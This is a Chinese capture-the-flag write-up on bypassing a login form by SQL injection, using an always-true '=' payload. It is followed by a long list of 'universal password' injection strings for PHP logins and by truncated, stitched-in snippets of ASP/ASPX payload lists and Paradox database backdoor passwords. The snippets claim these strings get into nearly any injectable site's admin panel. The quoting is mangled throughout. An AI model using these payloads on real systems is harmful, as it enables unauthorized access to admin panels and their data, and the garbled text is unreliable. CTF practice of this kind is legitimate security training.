登陸一下好嗎??
題目鏈結:
解題思路:
登陸一下好嗎?表明可能登陸成功後就能得到flag,但是題目已經說過濾了的一切,所以一些關鍵字 例如 or ,應該被過濾了。
通常的後台**應該是:
select username,password from user where username=』$user』 and password =』 $pwd』
需要將where的條件轉換為永真式,就能查詢到所有的使用者和密碼,
因此構造
username 『=』
password 『=』
即where username=』』=』』 and password=』』=』』
等號左右都是空 ,構成了永真式,因此語句能夠執行,登陸以後就會看到flag
ps:payload的username和password都是 任意字母』=『任意字母 例如 t』=『p 此時where 語句從左向右依次讀取,username=『t』 返回 false=『p』 『p』進行型別轉換是 0 即 false=0 結果是true,同理可得true and true 成為永真式。
php常見的萬能密碼:
admin』/*
密碼*/』
『or 1=1/*
"or 「a」="a
「or 1=1–
「or」=」
「or」="a』=『a
「or1=1–
「or=or」
'『or』=『or』
『) or (『a』=『a
『.).or.(』.a.』=』.a
'or 1=1
'or 1=1–
'or 1=1/*
'or」="a』=『a
『or』 『1』=『1』
『or』』=』
『or』』=』『or』』=』
『or』=『1』
『or』=『or』
'or.『a.』='a
『or1=1–
1』or』1』=『1
a』or』 1=1–
a』or』1=1–
or 『a』=『a』
or 1=1–
or1=1–
萬能密碼 php,PHP萬能密碼
說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...
asp aspx php jsp萬能密碼
asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...
PARADOX DB 萬能密碼
paradox資料庫的萬能密碼 如果是paradox,請用此萬能密碼 jiggae 還有 nx66ppx 注意大小寫 version password paradox 7 jiggae or cupcdvum paradox 5 jiggae or cupcdvum paradox 4 nx66pp...